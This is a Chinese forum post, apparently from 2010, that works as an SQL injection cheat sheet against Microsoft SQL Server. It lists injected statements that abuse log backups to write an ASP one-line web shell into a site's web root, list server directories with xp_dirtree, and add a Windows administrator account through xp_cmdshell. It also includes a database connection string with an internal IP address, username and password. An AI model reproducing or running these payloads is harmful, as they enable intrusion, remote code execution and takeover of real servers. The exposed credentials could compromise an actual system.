|
|
1.InjectionURL';alter database rxjhgame set RECOVERY FULL-- (把SQL设置成日志完全恢复模式)
2.InjectionURL';create table cmd (a image)-- (新建立一个cmd表)
3.InjectionURL';backup log rxjhgame to disk = 'c:\cpu' with init-- (减少备分数据的大小)
4.InjectionURL';insert into cmd (a) values (0x3C256576616C2872657175657374282223222929253E)-- (插入一句话木马)
5.InjectionURL';backup log rxjhgame to disk = 'E:\IDDCWEB\17qupk\wwwroot\gan.asp'-- (备分日志到WEB路径)
6.InjectionURL';drop table cmd-- (删除新建的cmd表)
7.InjectionURL';alter database rxjhgame set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)
Driver={Sql Server};Server=192.168.200.188,1433;Database=rxjhgame;Uid=17qupk;Pwd=fdkjdsf
create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- 创建一个表
insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'E:\',1,1;-- 将E盘的目录写入表中
通过xp_dirtree组件 把E盘的内容 存到TEMP表里 然后查看TEMP的内容 就是E盘的内容
delete temp where num1>='1' 删除TEMP表里的内容
insert into temp(id,num1,num2) exec master.dbo.xp_dirtree 'E:\IDDCWEB\17qupk\wwwroot',1,1;--
日志备份:
alter database rxjhgame set RECOVERY FULL--
create table cmd (a image)--
backup log rxjhgame to disk = 'c:\cpu' with init--
insert into cmd (a) values ('<%execute request("a")%>');--
backup log rxjhgame to disk = 'E:\IDDCWEB\17qupk\wwwroot\gan.asp'--
drop table cmd--
alter database rxjhgame set RECOVERY SIMPLE--(把SQL设置成日志简单恢复模式)
用查询分析器备份时,必须要用当前用户登录,用SA无法成功
backup database rxjhgame to disk = 'c:\x.bak' 备份数据库
sa权限创建管理员用户
1.判断是否有注入;and 1=1 ;and 1=2
;and user_name()='dbo' 判断当前系统的连接用户是不是sa
2.添加系统的管理员
;exec master.dbo.xp_cmdshell 'net user jiaozhu jiaozhu /add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators jiaozhu /add';--
alter database [17qupkdongyi] set RECOVERY FULL--
出错时加[]作为对象处理 |
|
狗仔卡
发表于 2010-2-2 15:52:28
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
显身卡